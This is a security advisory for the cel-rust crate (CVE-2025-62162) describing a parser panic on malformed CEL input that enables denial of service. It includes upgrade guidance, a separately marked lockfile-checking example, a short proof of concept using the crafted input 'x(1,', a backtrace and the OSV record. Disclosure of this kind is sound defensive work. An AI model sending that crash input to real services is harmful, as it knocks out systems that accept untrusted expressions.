GHSA-WXWX-9FH7-5MRW
Vulnerability from github – Published: 2025-10-11 01:30 – Updated: 2025-10-11 01:30
Summary
cel-rust May Panic During Parsing of Invalid CEL Expressions
Details
Summary
Parsing certain malformed CEL expressions can cause the parser to panic, terminating the process. When the crate is used to evaluate untrusted expressions (e.g., user-supplied input over an API), an attacker can send crafted input to trigger a denial of service (DoS).
Remediation
Upgrade to 0.11.4:

```toml
[dependencies]
cel = "0.11.4"
```
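Added example, not part of the advisory or the cel-rust project: a std-only Rust check that scans `Cargo.lock` text for `cel` entries inside the affected range given in the advisory record (introduced 0.10.0, fixed 0.11.4). The function names and the sample lockfile are constructed for illustration.

```rust
// Added example: flag `cel` versions in Cargo.lock that fall inside the
// advisory's affected range. Names and sample data here are illustrative.

/// (major, minor, patch, is_release). A pre-release sorts below the release
/// with the same triple because `false < true`.
type Version = (u64, u64, u64, bool);

const CRATE: &str = "cel";
const INTRODUCED: Version = (0, 10, 0, true); // inclusive lower bound
const FIXED: Version = (0, 11, 4, true); // exclusive upper bound

fn parse_version(s: &str) -> Option<Version> {
    let s = s.split('+').next()?; // build metadata does not affect ordering
    let (core, is_release) = match s.split_once('-') {
        Some((core, _pre)) => (core, false),
        None => (s, true),
    };
    let mut parts = core.split('.');
    let major: u64 = parts.next()?.parse().ok()?;
    let minor: u64 = parts.next()?.parse().ok()?;
    let patch: u64 = parts.next()?.parse().ok()?;
    if parts.next().is_some() {
        return None;
    }
    Some((major, minor, patch, is_release))
}

fn is_affected(v: Version) -> bool {
    v >= INTRODUCED && v < FIXED
}

/// Extracts the value of a `key = "value"` line, or None for anything else.
fn quoted_value<'a>(line: &'a str, key: &str) -> Option<&'a str> {
    let rest = line.trim().strip_prefix(key)?.trim_start();
    let rest = rest.strip_prefix('=')?.trim();
    rest.strip_prefix('"')?.strip_suffix('"')
}

/// Returns every locked `cel` version that is inside the affected range.
fn affected_cel_versions(lockfile: &str) -> Vec<String> {
    let mut hits = Vec::new();
    let mut name: Option<&str> = None;
    let mut version: Option<&str> = None;
    // A trailing sentinel header flushes the final package entry.
    for line in lockfile.lines().chain(std::iter::once("[[package]]")) {
        if line.trim() == "[[package]]" {
            if name == Some(CRATE) {
                if let Some(v) = version {
                    if parse_version(v).map_or(false, is_affected) {
                        hits.push(v.to_string());
                    }
                }
            }
            name = None;
            version = None;
        } else if let Some(v) = quoted_value(line, "name") {
            name = Some(v);
        } else if let Some(v) = quoted_value(line, "version") {
            version = Some(v);
        }
    }
    hits
}

// Constructed sample lockfile: one affected and one fixed `cel` entry.
const SAMPLE_LOCK: &str = r#"# This file is automatically @generated by Cargo.
version = 4

[[package]]
name = "cel"
version = "0.10.0"

[[package]]
name = "cel"
version = "0.11.4"

[[package]]
name = "serde"
version = "1.0.219"
"#;

fn main() {
    let hits = affected_cel_versions(SAMPLE_LOCK);
    if hits.is_empty() {
        println!("no affected cel versions locked");
    } else {
        println!("affected cel versions locked: {}", hits.join(", "));
    }
}
```

The lower bound is inclusive and the upper bound exclusive, so 0.11.4 itself is reported as not affected.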
PoC
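```rust
use cel::{Context, Program};

fn main() {
    // "x(1," is a malformed (unterminated) call; on affected versions the
    // parser panics on it (see the backtrace below).
    let program = Program::compile("x(1,").unwrap();
    let context = Context::default();
    let value = program.execute(&context).unwrap();
    assert_eq!(value, true.into());
}
```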
$ RUST_BACKTRACE=1 cargo run --bin example-simple
Compiling num-traits v0.2.19
Compiling aho-corasick v1.1.3
Compiling regex-syntax v0.8.5
Compiling arbitrary v1.4.1
Compiling serde v1.0.219
Compiling thiserror v1.0.69
Compiling regex-automata v0.4.9
Compiling chrono v0.4.41
Compiling regex v1.11.1
Compiling cel v0.10.0 (/home/john/git/cel-rust/cel)
warning: `cel` (lib) generated 15 warnings
Compiling example v0.1.0 (/home/john/git/cel-rust/example)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 2.97s
Running `target/debug/example-simple`
thread 'main' panicked at /home/john/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/antlr4rust-0.3.0-beta3/src/tree.rs:383:9:
internal error: entered unreachable code: should have been properly implemented by generated context when reachable
stack backtrace:
0: __rustc::rust_begin_unwind
1: core::panicking::panic_fmt
2: antlr4rust::tree::Visitable::accept
3: <cel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
4: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
5: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
6: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
7: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_calc
8: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_calc
9: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::CalcContextExt>>::accept
10: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
11: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
12: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
13: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_relation
14: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_relation
15: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::RelationContextExt>>::accept
16: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
17: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
18: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
19: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalAnd
20: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalAnd
21: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalAndContextExt>>::accept
22: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
23: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
24: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
25: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalOr
26: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalOr
27: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalOrContextExt>>::accept
28: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
29: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
30: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
31: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_expr
32: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_expr
33: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ExprContextExt>>::accept
34: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
35: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
36: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
37: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_GlobalCall::{{closure}}
38: <core::iter::adapters::map::Map<I,F> as core::iter::traits::iterator::Iterator>::next
39: alloc::vec::Vec<T,A>::extend_desugared
40: <alloc::vec::Vec<T,A> as alloc::vec::spec_extend::SpecExtend<T,I>>::spec_extend
41: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter_nested::SpecFromIterNested<T,I>>::from_iter
42: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter::SpecFromIter<T,I>>::from_iter
43: <alloc::vec::Vec<T> as core::iter::traits::collect::FromIterator<T>>::from_iter
44: core::iter::traits::iterator::Iterator::collect
45: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_GlobalCall
46: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_GlobalCall
47: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::GlobalCallContextExt>>::accept
48: <cel::parser::gen::celparser::PrimaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
49: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
50: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
51: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
52: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_PrimaryExpr
53: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_PrimaryExpr
54: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::PrimaryExprContextExt>>::accept
55: <cel::parser::gen::celparser::MemberContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
56: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
57: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
58: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
59: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_MemberExpr
60: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_MemberExpr
61: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::MemberExprContextExt>>::accept
62: <cel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
63: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
64: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
65: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
66: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_calc
67: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_calc
68: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::CalcContextExt>>::accept
69: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
70: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
71: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
72: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_relation
73: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_relation
74: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::RelationContextExt>>::accept
75: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
76: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
77: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
78: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalAnd
79: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalAnd
80: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalAndContextExt>>::accept
81: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
82: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
83: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
84: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalOr
85: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalOr
86: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalOrContextExt>>::accept
87: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
88: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
89: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
90: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_expr
91: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_expr
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
Impact
Users who accept untrusted CEL expressions are affected.
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "cel"
},
"ranges": [
{
"events": [
{
"introduced": "0.10.0"
},
{
"fixed": "0.11.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62162"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-11T01:30:53Z",
"nvd_published_at": "2025-10-10T23:15:36Z",
"severity": "HIGH"
},
"id": "GHSA-wxwx-9fh7-5mrw",
"modified": "2025-10-11T01:30:54Z",
"published": "2025-10-11T01:30:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cel-rust/cel-rust/security/advisories/GHSA-wxwx-9fh7-5mrw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62162"
},
{
"type": "WEB",
"url": "https://github.com/cel-rust/cel-rust/commit/9df9822d81d91a3ce0fc9f712f4574a659247be3"
},
{
"type": "PACKAGE",
"url": "https://github.com/cel-rust/cel-rust"
},
{
"type": "WEB",
"url": "https://github.com/cel-rust/cel-rust/releases/tag/cel-v0.11.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "cel-rust May Panic During Parsing of Invalid CEL Expressions"
}